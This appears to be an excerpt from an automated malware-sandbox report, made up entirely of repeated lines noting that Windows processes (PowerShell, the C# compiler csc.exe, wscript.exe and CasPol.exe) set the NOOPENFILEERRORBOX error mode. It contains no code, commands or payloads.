                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
